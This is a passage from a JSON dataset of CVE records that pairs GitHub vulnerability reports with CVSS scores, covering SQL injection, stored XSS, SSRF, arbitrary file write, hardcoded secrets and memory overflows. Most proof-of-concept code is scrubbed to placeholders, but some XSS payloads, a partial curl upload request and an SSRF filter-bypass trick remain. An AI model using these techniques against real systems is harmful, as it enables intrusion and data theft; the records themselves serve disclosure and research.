  80379. "exploitabilityScore": 3.9
  80380. },
  80381. {
  80382. "CVE_ID": "CVE-2022-25505",
  80383. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/27",
  80384. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/27",
  80385. "Repo_new": "taogogo/taocms",
  80386. "Issue_Created_At": "2022-02-16T12:15:56Z",
  80387. "description": "taocms NUMBERTAG SQL injection exists in the background. Vulnerability file address: PATHTAG FILETAG It can be seen that the update function does not filter the id. After obtaining the id with the columnsdata function, it is brought into the updatelist function to update the data. FILETAG Then bring the id into the getlist function for the select query FILETAG Finally, the id is brought into the updatelist function for an update As can be seen from the above, a total of three SQL statements were executed, and none of the ids were filtered. Vulnerability to reproduce: APITAG the environment locally, and then enter the background APITAG the Manage section, then click Edit, and finally click Submit FILETAG FILETAG APITAG use burpsuite to capture a packet and send the packet to the repeater module FILETAG APITAG vulnerability variable is id, and the payload is constructed as: and APITAG Click send, you can see that the successful delay is NUMBERTAG seconds\uff0cas mentioned earlier, this is because the SQL statement is executed NUMBERTAG times FILETAG Repair suggestion: filter by id",
  80388. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80389. "severity": "CRITICAL",
  80390. "baseScore": 9.8,
  80391. "impactScore": 5.9,
  80392. "exploitabilityScore": 3.9
  80393. },
  80394. {
  80395. "CVE_ID": "CVE-2022-25506",
  80396. "Issue_Url_old": "https://github.com/FreeTAKTeam/UI/issues/27",
  80397. "Issue_Url_new": "https://github.com/freetakteam/ui/issues/27",
  80398. "Repo_new": "freetakteam/ui",
  80399. "Issue_Created_At": "2022-02-16T09:38:15Z",
  80400. "description": "SQL Injection on APITAG The API endpoint APITAG contains a SQL Injection into the APITAG Database that is handling the authentication process of the APITAG In order to exploit this vulnerability the attacker need to possess a valid API key, which can either be leaked through the XSS from an End User Device, or given as a part of the UAV Operator ability which broadcasts the GPS and Video feed of a UAV Drone. From the SQL Injection it is possible to list all the Username, APITAG and Clear Text passwords in the database. Proof of Concept Posting the follwing snippet into a web browsers console will trigger the SQL Injection and return the name and password for each user in the APITAG table. ERRORTAG Will return the following response: FILETAG Which clearly shows the database results in clear text.",
  80401. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  80402. "severity": "MEDIUM",
  80403. "baseScore": 6.5,
  80404. "impactScore": 3.6,
  80405. "exploitabilityScore": 2.8
  80406. },
  80407. {
  80408. "CVE_ID": "CVE-2022-25507",
  80409. "Issue_Url_old": "https://github.com/FreeTAKTeam/UI/issues/28",
  80410. "Issue_Url_new": "https://github.com/freetakteam/ui/issues/28",
  80411. "Repo_new": "freetakteam/ui",
  80412. "Issue_Created_At": "2022-02-16T09:44:15Z",
  80413. "description": "XSS through Emergency Alert. In the APITAG UI there is a function to create and view Emergency Alerts that are originating from either the End User Device or from the UI itself. Both Avenues are susceptible to a Stored Cross Site scripting vulnerability in the Callsign parameter. Web Interface In the case of a XSS in the APITAG it is as simple as having a callsign with the payload of ERRORTAG which will trigger the Emergency function and display the emergency in the APITAG FILETAG FILETAG End User Device What's more interesting of a scenario is that it is possible to push Emergencies from any of the EUDs, these can range from a NUMBERTAG TIC APITAG in Contact) or similar. This can be chained together with the API keys leakage in the response in order to obtain a server APITAG key for further exploitation, which can take a normal user in the field to a Web Server admin FILETAG FILETAG FILETAG",
  80414. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80415. "severity": "MEDIUM",
  80416. "baseScore": 5.4,
  80417. "impactScore": 2.7,
  80418. "exploitabilityScore": 2.3
  80419. },
  80420. {
  80421. "CVE_ID": "CVE-2022-25508",
  80422. "Issue_Url_old": "https://github.com/FreeTAKTeam/FreeTakServer/issues/291",
  80423. "Issue_Url_new": "https://github.com/freetakteam/freetakserver/issues/291",
  80424. "Repo_new": "freetakteam/freetakserver",
  80425. "Issue_Created_At": "2022-02-16T09:39:27Z",
  80426. "description": "Unauthenticated Public APITAG Endpoint. In the APITAG there is also the Endpoint PATHTAG which is unauthenticated. While this might not seem interesting at first, it is possible to broadcast new routes (suggested tracks to take) to every End User Device (EUD) connected to the server. This can create two issues, either create a Denial of Service situation where a malicious user can fill the entire map with routes, making it impossible to use the map in the EUD. The second scenario might be to create a route on which possible users might take and therefor control some of the paths and direct users into bad situations. FILETAG",
  80427. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  80428. "severity": "HIGH",
  80429. "baseScore": 7.5,
  80430. "impactScore": 3.6,
  80431. "exploitabilityScore": 3.9
  80432. },
  80433. {
  80434. "CVE_ID": "CVE-2022-25510",
  80435. "Issue_Url_old": "https://github.com/FreeTAKTeam/FreeTakServer/issues/292",
  80436. "Issue_Url_new": "https://github.com/freetakteam/freetakserver/issues/292",
  80437. "Repo_new": "freetakteam/freetakserver",
  80438. "Issue_Created_At": "2022-02-16T09:47:16Z",
  80439. "description": "Hardcoded Flask Secrets Key APITAG Escalation\". In the sourcecode there are NUMBERTAG relevant places that the Flask Secrets Key are hardcoded. Flask signs all their client sessions with this secret key, usually defined in an APITAG Variable_. In this case though there's these three places that these are hardcoded into. FILETAG This gives a malicious user the ability to sign their own cookies (using for example: Flask Unsign URLTAG , and internally change the UID of the current user and assume any other user, for example UID NUMBERTAG which is the Admin. APITAG Escalation) Another interessting issue that you run into aswell is that having two Flask servers with the same _secret key_ makes it possible for a user to reuse a UID NUMBERTAG cookie from Server A, and apply that cookie to Server B logging in to the same UID NUMBERTAG APITAG APITAG bypass).",
  80440. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  80441. "severity": "HIGH",
  80442. "baseScore": 8.8,
  80443. "impactScore": 5.9,
  80444. "exploitabilityScore": 2.8
  80445. },
  80446. {
  80447. "CVE_ID": "CVE-2022-25511",
  80448. "Issue_Url_old": "https://github.com/FreeTAKTeam/UI/issues/29",
  80449. "Issue_Url_new": "https://github.com/freetakteam/ui/issues/29",
  80450. "Repo_new": "freetakteam/ui",
  80451. "Issue_Created_At": "2022-02-16T09:49:50Z",
  80452. "description": "Arbitrary File Write APITAG UI APITAG Code Execution). User Interface Datapackage From the APITAG it is possible to (once logged in) upload APITAG directly to the server so that it is possible to download the zipped files on the EUD in the field. The route APITAG takes an argument APITAG which is not sanitized for either the path or the filename outside of the UI, so an attacker can place a file with any name anywhere on the filesystem that the web server process can write to. Going this route appends some junk XML data to the end of the file, which makes it hard (but not impossible) to achieve code execution through Python or Flask templating. This was achieved using a transparent proxy to catch and modify the web request, but can also be achieved using something like FILETAG Proof Of Concept Request through Burpsuite: FILETAG File on system: FILETAG APITAG that the webserver is at that moment run as root, APITAG Recommended_) Bash equivalent APITAG `bash curl i s k X POST H APITAG APITAG H APITAG Bearer APITAG H APITAG Type: multipart/form data; boundary= APITAG H APITAG Encoding: gzip, deflate' data binary PATHTAG form data; name= assetfile ; filename= test.ext APITAG Type: PATHTAG PATHTAG ' URLTAG",
  80453. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  80454. "severity": "MEDIUM",
  80455. "baseScore": 6.5,
  80456. "impactScore": 3.6,
  80457. "exploitabilityScore": 2.8
  80458. },
  80459. {
  80460. "CVE_ID": "CVE-2022-25512",
  80461. "Issue_Url_old": "https://github.com/FreeTAKTeam/UI/issues/26",
  80462. "Issue_Url_new": "https://github.com/freetakteam/ui/issues/26",
  80463. "Repo_new": "freetakteam/ui",
  80464. "Issue_Created_At": "2022-02-16T09:36:43Z",
  80465. "description": "API and Websocket Keys Leakage. The APITAG leaks the APITAG and Websocket tokens in the JavaScript source code! These secrets should not be reflected back to the user, because any client-side bug (for example an XSS) can then read them and issue unintended, authenticated requests. API Bearer Token FILETAG Websocket Token FILETAG",
  80466. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  80467. "severity": "HIGH",
  80468. "baseScore": 7.5,
  80469. "impactScore": 3.6,
  80470. "exploitabilityScore": 3.9
  80471. },
  80472. {
  80473. "CVE_ID": "CVE-2022-25523",
  80474. "Issue_Url_old": "https://github.com/Typesetter/Typesetter/issues/697",
  80475. "Issue_Url_new": "https://github.com/typesetter/typesetter/issues/697",
  80476. "Repo_new": "typesetter/typesetter",
  80477. "Issue_Created_At": "2022-03-23T20:18:51Z",
  80478. "description": "CSRF Vulnerabilities in APITAG [ CVETAG ]. APITAG NUMBERTAG was discovered to contain a Cross Site Request Forgery (CSRF) which is exploited via a crafted POST request. Vulnerability Type Cross Site Request Forgery (CSRF) Vendor of Product APITAG Affected Product Code Base APITAG NUMBERTAG are affected Affected Component All the POST requests Attack Type Remote Impact Escalation of Privileges true Attack Vector CODETAG Discoverer Danish Tariq Reference FILETAG URLTAG CVETAG",
  80479. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80480. "severity": "HIGH",
  80481. "baseScore": 8.8,
  80482. "impactScore": 5.9,
  80483. "exploitabilityScore": 2.8
  80484. },
  80485. {
  80486. "CVE_ID": "CVE-2022-25568",
  80487. "Issue_Url_old": "https://github.com/ccrisan/motioneye/issues/2292",
  80488. "Issue_Url_new": "https://github.com/motioneye-project/motioneye/issues/2292",
  80489. "Repo_new": "motioneye-project/motioneye",
  80490. "Issue_Created_At": "2022-02-17T17:39:27Z",
  80491. "description": "Lack of a default user password exposes config file which contains potentially sensitive information. Last time I posted (in APITAG maybe) about the default lack of admin password/easily bruteforced password, leaving users open to remote code execution, and it was seen as a non issue, so this may also be a non issue to you. If a \"user\" password is unset, even if an \"admin\" password is set, the config file at the PATHTAG endpoint remains viewable to anybody that has access to the APITAG instance. Using Shodan, I've found a large amount of them open to the public. This config file contains some highly sensitive information such as email addresses and passwords for various services where uploading of files occur such as external FTP, SFTP, gmail, gdrive, telegram, and potentially others. I just wanted to post this so people know that even if they set an \"admin\" password, they also need to set a \"user\" password especially if their config contains sensitive information like credentials for an upload service and even more especially if they also expose their APITAG instance to the internet.",
  80492. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  80493. "severity": "HIGH",
  80494. "baseScore": 7.5,
  80495. "impactScore": 3.6,
  80496. "exploitabilityScore": 3.9
  80497. },
  80498. {
  80499. "CVE_ID": "CVE-2022-25574",
  80500. "Issue_Url_old": "https://github.com/aqianhei/aqian/issues/1",
  80501. "Issue_Url_new": "https://github.com/aqianhei/aqian/issues/1",
  80502. "Repo_new": "aqianhei/aqian",
  80503. "Issue_Created_At": "2022-02-18T06:39:38Z",
  80504. "description": "douphp. FILETAG",
  80505. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  80506. "severity": "MEDIUM",
  80507. "baseScore": 4.8,
  80508. "impactScore": 2.7,
  80509. "exploitabilityScore": 1.7
  80510. },
  80511. {
  80512. "CVE_ID": "CVE-2022-25585",
  80513. "Issue_Url_old": "https://github.com/union-home/unioncms/issues/5",
  80514. "Issue_Url_new": "https://github.com/union-home/unioncms/issues/5",
  80515. "Repo_new": "union-home/unioncms",
  80516. "Issue_Created_At": "2022-02-19T11:07:31Z",
  80517. "description": "Stored XSS exists. APITAG problem is in system settings basic settings default settings third party code write\uff1a APITAG alert NUMBERTAG APITAG Save, open the home page and the XSS code will pop up The problem is as follows\uff1a FILETAG APITAG background content management all management modules add a piece of content insert video in the content, write\uff1aimg src=\"x\" onerror=\"alert NUMBERTAG FILETAG Save, open the corresponding foreground article and background article will pop up XSS code The problem is as follows\uff1a FILETAG",
  80518. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80519. "severity": "MEDIUM",
  80520. "baseScore": 5.4,
  80521. "impactScore": 2.7,
  80522. "exploitabilityScore": 2.3
  80523. },
  80524. {
  80525. "CVE_ID": "CVE-2022-25590",
  80526. "Issue_Url_old": "https://github.com/javahuang/SurveyKing/issues/7",
  80527. "Issue_Url_new": "https://github.com/javahuang/surveyking/issues/7",
  80528. "Repo_new": "javahuang/surveyking",
  80529. "Issue_Created_At": "2022-02-20T04:55:08Z",
  80530. "description": "There is a logout logic vulnerability in the back end (insufficient session expiration). Version NUMBERTAG First, log in to the back end normally and send query requests. Pay attention to the cookies FILETAG Then click the logout button. At this time, the back-end code does not invalidate the user's session on the server; it only redirects to the login page. You can see that the requested data can still be obtained normally with the previous cookie. An attacker who obtains the old cookie (for example from the browser cache) can therefore continue to use the session after the user has logged out. FILETAG Repair suggestion: on logout, invalidate the user's server-side session first, and only then redirect to the login page.",
  80531. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  80532. "severity": "MEDIUM",
  80533. "baseScore": 6.5,
  80534. "impactScore": 3.6,
  80535. "exploitabilityScore": 2.8
  80536. },
  80537. {
  80538. "CVE_ID": "CVE-2022-25758",
  80539. "Issue_Url_old": "https://github.com/sasstools/scss-tokenizer/issues/45",
  80540. "Issue_Url_new": "https://github.com/sasstools/scss-tokenizer/issues/45",
  80541. "Repo_new": "sasstools/scss-tokenizer",
  80542. "Issue_Created_At": "2022-01-12T21:11:06Z",
  80543. "description": "CVETAG Might apply?. Dear SCSS Tokenizer Team, In scanning my node_modules for Regular Expression Denial of Service APITAG Affecting APITAG URLTAG and CVETAG URLTAG I encountered scss tokenizer with FILETAG with the same style regular expression that is cited in the CVE commit URLTAG . postcss APITAG scss tokenizer APITAG It's slightly different, and maybe worth your time to double check. I hope this helps.",
  80544. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  80545. "severity": "HIGH",
  80546. "baseScore": 7.5,
  80547. "impactScore": 3.6,
  80548. "exploitabilityScore": 3.9
  80549. },
  80550. {
  80551. "CVE_ID": "CVE-2022-25838",
  80552. "Issue_Url_old": "https://github.com/laravel/fortify/issues/201",
  80553. "Issue_Url_new": "https://github.com/laravel/fortify/issues/201",
  80554. "Repo_new": "laravel/fortify",
  80555. "Issue_Created_At": "2021-01-17T19:39:15Z",
  80556. "description": "Current NUMBERTAG fa solution can lock users out of their accounts. Version NUMBERTAG Laravel Version NUMBERTAG PHP Version NUMBERTAG Description: The current two factor authentication solution sets NUMBERTAG fa to enabled without requiring a confirmation (via TOTP) that the authenticator app is actually set up. Steps To Reproduce: The current solution works like this NUMBERTAG APITAG , the user's APITAG is stored NUMBERTAG fa is now enabled NUMBERTAG APITAG , show QR code and ask user to scan the code with their app NUMBERTAG APITAG , show recovery codes and ask the user to save them NUMBERTAG User abandons the process before setting up their authenticator app or saving the recovery codes and is now locked out of their account . They could abandon the process because they first need to choose one of the many TOTP generators in the app store, and get side tracked, or their session times out, or they click the back button, or close their tab, or their computer crashes, ... Definitely NUMBERTAG fa must not be enabled before it is confirmed by a generated OTP. How To Fix It NUMBERTAG APITAG generates a QR code from a new two factor secret that is stored in the session NUMBERTAG APITAG , show the recovery codes to the user, ask them to save them NUMBERTAG The user is asked to set up their authenticator app with this QR code and enter a resulting TOTP code. This confirms that they have set up their authenticator (else they cannot generate a valid code), and can also (by written explanation) be used as confirmation that recovery codes were stored in a safe place NUMBERTAG APITAG , receives a new parameter: code . The code is validated using the two factor secret stored in the session NUMBERTAG If the code is valid, the two factor secret from the session is written into the user table (= enabling NUMBERTAG fa, now for real). If not, then the response indicates that the user did not enter a valid code and must re try.",
  80557. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80558. "severity": "HIGH",
  80559. "baseScore": 8.1,
  80560. "impactScore": 5.9,
  80561. "exploitabilityScore": 2.2
  80562. },
  80563. {
  80564. "CVE_ID": "CVE-2022-25851",
  80565. "Issue_Url_old": "https://github.com/jpeg-js/jpeg-js/issues/105",
  80566. "Issue_Url_new": "https://github.com/jpeg-js/jpeg-js/issues/105",
  80567. "Repo_new": "jpeg-js/jpeg-js",
  80568. "Issue_Created_At": "2022-06-02T07:17:55Z",
  80569. "description": "jpeg js APITAG (infinite loop). The following input can create an infinite loop inside jpeg js, causing it to never return: APITAG Based on some preliminary debugging it appears to be related to the following code: URLTAG Here APITAG and APITAG are initialized to zero, but since there are no components, the values are never modified, leading to a divide by zero in the last two lines (which set APITAG and APITAG to Infinity ). These values are later used inside the APITAG function, where the following loop condition never evaluates to false since APITAG is set to APITAG (i.e. APITAG ) at line NUMBERTAG in APITAG . URLTAG found using jsfuzz URLTAG",
  80570. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  80571. "severity": "HIGH",
  80572. "baseScore": 7.5,
  80573. "impactScore": 3.6,
  80574. "exploitabilityScore": 3.9
  80575. },
  80576. {
  80577. "CVE_ID": "CVE-2022-25854",
  80578. "Issue_Url_old": "https://github.com/yairEO/tagify/issues/988",
  80579. "Issue_Url_new": "https://github.com/yaireo/tagify/issues/988",
  80580. "Repo_new": "yaireo/tagify",
  80581. "Issue_Created_At": "2022-02-16T15:50:15Z",
  80582. "description": "XSS in tagify's template wrapper. Prerequisites FILETAG Steps to reproduce NUMBERTAG Open the following forked Tagify's React Wrapper demo NUMBERTAG Notice line NUMBERTAG URLTAG where a APITAG variable is declared. This variable mocks data that came from an API or an input NUMBERTAG On the line NUMBERTAG URLTAG we use the APITAG variable to customize tags NUMBERTAG Once the demo app is rendered, open the APITAG tab and hover on the first input. It will fire the XSS. The following screenshot shows the XSS run on FILETAG APITAG The following screenshot shows the same XSS run in the dev build of the app. APITAG As you see, the tagify builds a new span with an attribute that was not supposed to be there.",
  80583. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80584. "severity": "MEDIUM",
  80585. "baseScore": 5.4,
  80586. "impactScore": 2.7,
  80587. "exploitabilityScore": 2.3
  80588. },
  80589. {
  80590. "CVE_ID": "CVE-2022-25856",
  80591. "Issue_Url_old": "https://github.com/argoproj/argo-events/issues/1947",
  80592. "Issue_Url_new": "https://github.com/argoproj/argo-events/issues/1947",
  80593. "Repo_new": "argoproj/argo-events",
  80594. "Issue_Created_At": "2022-05-10T17:50:38Z",
  80595. "description": "Insecure path traversal in Git Trigger Source can lead to arbitrary file read. APITAG APITAG APITAG Severity | High | Difficulty | High Target | \u00a0 APITAG APITAG ERRORTAG No checks are made on this file at read time, which could allow an attacker to read files anywhere on the system. This could be achieved in at least three ways: Symbolic link in Git repository An attacker controls a Git repository that the victim uses in a Git Trigger Source. The attacker adds a file to the Git repository that is a symbolic link to a file containing sensitive information on the victim's machine. Argo then clones the repository onto the victim's machine, and the symbolic link is followed during the file read on the marked line above. An attacker could now read the file containing sensitive information. Race condition An attacker who has limited access to the file system may be able to read arbitrary files by leveraging a race condition. The attacker could replace the git temp directory created by argo with a symbolic link to the directory containing the file to be read. This could be done anytime between the time it is created in (g APITAG and the file is read in the return statement of (g APITAG APITAG dir string). Malicious manifest An attacker controls a manifest for a Git Trigger Source that the victim creates. The manifest has a APITAG to a sensitive file anywhere on the victim's machine, for example: CODETAG Recommendations Disallow symbolic links Check whether the file at APITAG is a symbolic link before it is opened and read in (g APITAG Fail if it is. Sanitize APITAG This includes checks for unsafe path patterns, such as: Check whether the string begins with \u201c/\u201d. Disallow \u201c..\u201d, \u201c\\\u201d, \u201c~\u201d in the path. Other checks to ensure that only files from the Git repository can be read",
  80596. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  80597. "severity": "HIGH",
  80598. "baseScore": 7.5,
  80599. "impactScore": 3.6,
  80600. "exploitabilityScore": 3.9
  80601. },
  80602. {
  80603. "CVE_ID": "CVE-2022-25876",
  80604. "Issue_Url_old": "https://github.com/ospfranco/link-preview-js/issues/115",
  80605. "Issue_Url_new": "https://github.com/ospfranco/link-preview-js/issues/115",
  80606. "Repo_new": "ospfranco/link-preview-js",
  80607. "Issue_Created_At": "2022-05-25T07:33:47Z",
  80608. "description": "SSRF. Describe There is a way to bypass the regex that is meant to block private & local networks: the check is applied to the hostname string, not to the address it resolves to. If we use FILETAG or URLTAG for a link preview, we don't see it ( ERRORTAG ), but if we use a domain that resolves to APITAG we can. For example: localtest.me resolves to APITAG (localhost), i.e. if you 'curl APITAG you see your localhost. Similarly we can read any other private & local address, on any port. The filter therefore needs to be applied to the resolved IP address(es), not to the hostname. To Reproduce Steps to reproduce NUMBERTAG Find a domain that resolves to a private address with a reverse IP lookup, or use localtest.me APITAG or devhead.net APITAG + APITAG + APITAG NUMBERTAG Write it to APITAG NUMBERTAG Done. You see your local domain. FILETAG",
  80609. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  80610. "severity": "MEDIUM",
  80611. "baseScore": 5.5,
  80612. "impactScore": 3.6,
  80613. "exploitabilityScore": 1.8
  80614. },
  80615. {
  80616. "CVE_ID": "CVE-2022-26125",
  80617. "Issue_Url_old": "https://github.com/FRRouting/frr/issues/10507",
  80618. "Issue_Url_new": "https://github.com/frrouting/frr/issues/10507",
  80619. "Repo_new": "frrouting/frr",
  80620. "Issue_Created_At": "2022-02-06T03:32:58Z",
  80621. "description": "isisd: overflow bugs in unpack_tlv_router_cap. URLTAG There are a few issues in the loop above leading to overflow vulnerabilities. The loop condition is APITAG and APITAG is updated at the end of the loop APITAG NUMBERTAG APITAG ). The Issue on Loop Condition : at Line NUMBERTAG when we update APITAG , if APITAG , integer overflow will happen, leading to heap overflows in the next loop iteration. Other Issues : at Line NUMBERTAG Line NUMBERTAG Line NUMBERTAG Line NUMBERTAG and Line NUMBERTAG I think we need to use break instead of continue . Using continue will let us miss the update of the loop condition variable at Line NUMBERTAG Please check if my understanding of the code above is correct. If so, I can make a pull request to fix these issues then.",
  80622. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80623. "severity": "HIGH",
  80624. "baseScore": 7.8,
  80625. "impactScore": 5.9,
  80626. "exploitabilityScore": 1.8
  80627. },
  80628. {
  80629. "CVE_ID": "CVE-2022-26126",
  80630. "Issue_Url_old": "https://github.com/FRRouting/frr/issues/10505",
  80631. "Issue_Url_new": "https://github.com/frrouting/frr/issues/10505",
  80632. "Repo_new": "frrouting/frr",
  80633. "Issue_Created_At": "2022-02-05T05:11:16Z",
  80634. "description": "isisd: misusing strdup leads to stack overflow. At Line NUMBERTAG in the code below, we call APITAG , which will further call APITAG . However, APITAG is not guaranteed to be a zero terminated string and, thus, will lead to a stack overflow in strdup . When I set APITAG to APITAG , then the bug disappears. Note that strdup should be used with a C string. In the same file, APITAG , there are NUMBERTAG places where APITAG are called on APITAG and, thus, the overflow may happen. Please check and suggest a fix. I can give a pull request then. URLTAG What follows is the output of the address sanitizer: ERRORTAG",
  80635. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80636. "severity": "HIGH",
  80637. "baseScore": 7.8,
  80638. "impactScore": 5.9,
  80639. "exploitabilityScore": 1.8
  80640. },
  80641. {
  80642. "CVE_ID": "CVE-2022-26128",
  80643. "Issue_Url_old": "https://github.com/FRRouting/frr/issues/10502",
  80644. "Issue_Url_new": "https://github.com/frrouting/frr/issues/10502",
  80645. "Repo_new": "frrouting/frr",
  80646. "Issue_Created_At": "2022-02-04T18:10:06Z",
  80647. "description": "An incorrect check on length in babeld. The check at Line NUMBERTAG is not correct. It should be APITAG because len does not include the first two bytes, i.e., APITAG and APITAG URLTAG",
  80648. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80649. "severity": "HIGH",
  80650. "baseScore": 7.8,
  80651. "impactScore": 5.9,
  80652. "exploitabilityScore": 1.8
  80653. },
  80654. {
  80655. "CVE_ID": "CVE-2022-26129",
  80656. "Issue_Url_old": "https://github.com/FRRouting/frr/issues/10503",
  80657. "Issue_Url_new": "https://github.com/frrouting/frr/issues/10503",
  80658. "Repo_new": "frrouting/frr",
  80659. "Issue_Created_At": "2022-02-04T21:17:08Z",
  80660. "description": "babeld: bugs in parse_hello_subtlv, parse_ihu_subtlv, and parse_update_subtlv. URLTAG Line NUMBERTAG the condition should be APITAG instead of APITAG . Otherwise, overflows will happen at NUMBERTAG Line NUMBERTAG the condition should be APITAG instead of APITAG . We need include extra two bytes, a[i] and a[i NUMBERTAG in this check.",
  80661. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80662. "severity": "HIGH",
  80663. "baseScore": 7.8,
  80664. "impactScore": 5.9,
  80665. "exploitabilityScore": 1.8
  80666. },
  80667. {
  80668. "CVE_ID": "CVE-2022-26174",
  80669. "Issue_Url_old": "https://github.com/beekeeper-studio/beekeeper-studio/issues/1051",
  80670. "Issue_Url_new": "https://github.com/beekeeper-studio/beekeeper-studio/issues/1051",
  80671. "Repo_new": "beekeeper-studio/beekeeper-studio",
  80672. "Issue_Created_At": "2022-02-21T07:24:12Z",
  80673. "description": "RCE Vulnerability in Beekeeper Studio. author: Gqliang MENTIONTAG Date NUMBERTAG Display fields are not filtered, allowing arbitrary code to be inserted, e.g.: FILETAG We can set up a fake MySQL server so that, once the user connects, any SQL statement they execute returns the remote code we choose, exp: FILETAG run this exp program eg : FILETAG As long as you execute any SELECT query in the program, the vulnerability will be triggered and arbitrary remote code executed. Of course it's not just that. eg: FILETAG",
  80674. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80675. "severity": "CRITICAL",
  80676. "baseScore": 9.8,
  80677. "impactScore": 5.9,
  80678. "exploitabilityScore": 3.9
  80679. },
  80680. {
  80681. "CVE_ID": "CVE-2022-26181",
  80682. "Issue_Url_old": "https://github.com/dropbox/lepton/issues/154",
  80683. "Issue_Url_new": "https://github.com/dropbox/lepton/issues/154",
  80684. "Repo_new": "dropbox/lepton",
  80685. "Issue_Created_At": "2022-02-21T11:00:57Z",
  80686. "description": "[Bug] A heap buffer overflow was discovered in function APITAG PATHTAG Description A heap buffer overflow was discovered in function APITAG PATHTAG The issue is being triggered in function APITAG PATHTAG Version lepton NUMBERTAG g2a NUMBERTAG b NUMBERTAG APITAG Commit) url: URLTAG Reproduce ERRORTAG POC poc file attached. ASAN Report ERRORTAG Occurrences [bitops.cc L NUMBERTAG L NUMBERTAG URLTAG References attached files URLTAG Contact me For any issue or problem please contact me. EMAILTAG Tweet. MENTIONTAG",
  80687. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80688. "severity": "HIGH",
  80689. "baseScore": 7.8,
  80690. "impactScore": 5.9,
  80691. "exploitabilityScore": 1.8
  80692. },
  80693. {
  80694. "CVE_ID": "CVE-2022-26198",
  80695. "Issue_Url_old": "https://github.com/notable/notable/issues/1595",
  80696. "Issue_Url_new": "https://github.com/notable/notable/issues/1595",
  80697. "Repo_new": "notable/notable",
  80698. "Issue_Created_At": "2022-02-22T06:54:26Z",
  80699. "description": "RCE Vulnerability in Notable. author: APITAG MENTIONTAG Date NUMBERTAG Text editing without filtering leads to arbitrary code execution Payload\uff1a ERRORTAG eg. FILETAG",
  80700. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80701. "severity": "CRITICAL",
  80702. "baseScore": 9.8,
  80703. "impactScore": 5.9,
  80704. "exploitabilityScore": 3.9
  80705. },
  80706. {
  80707. "CVE_ID": "CVE-2022-26244",
  80708. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/23",
  80709. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/23",
  80710. "Repo_new": "kishan0725/hospital-management-system",
  80711. "Issue_Created_At": "2022-03-29T09:38:55Z",
  80712. "description": "Persistent cross-site scripting (XSS) targeting the web admin through FILETAG via the parameter \"special\". Add a Doctor info payload to the Doctor Special field of the Add Doctor page to target FILETAG , then use Burp Suite to intercept the request data and change the 'special' parameter to an XSS payload: APITAG alert NUMBERTAG APITAG Steps to exploit NUMBERTAG Navigate to FILETAG NUMBERTAG Click APITAG Doctors ', use Burp Suite to insert the XSS payload in the \"special\" parameter NUMBERTAG Click APITAG Doctors\" FILETAG FILETAG Proof of concept APITAG APITAG alert NUMBERTAG APITAG",
  80713. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80714. "severity": "MEDIUM",
  80715. "baseScore": 5.4,
  80716. "impactScore": 2.7,
  80717. "exploitabilityScore": 2.3
  80718. },
  80719. {
  80720. "CVE_ID": "CVE-2022-26245",
  80721. "Issue_Url_old": "https://github.com/open-falcon/falcon-plus/issues/951",
  80722. "Issue_Url_new": "https://github.com/open-falcon/falcon-plus/issues/951",
  80723. "Repo_new": "open-falcon/falcon-plus",
  80724. "Issue_Created_At": "2022-02-23T07:08:36Z",
  80725. "description": "Report of a SQL injection vulnerability. SQL injection source PATHTAG line NUMBERTAG CODETAG SQL injection sink: the HTTP parameter is APITAG PATHTAG line NUMBERTAG ERRORTAG // provide sqlinjection bool True page FILETAG sqlinjection bool False page FILETAG FILETAG",
  80726. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80727. "severity": "CRITICAL",
  80728. "baseScore": 9.8,
  80729. "impactScore": 5.9,
  80730. "exploitabilityScore": 3.9
  80731. },
  80732. {
  80733. "CVE_ID": "CVE-2022-26247",
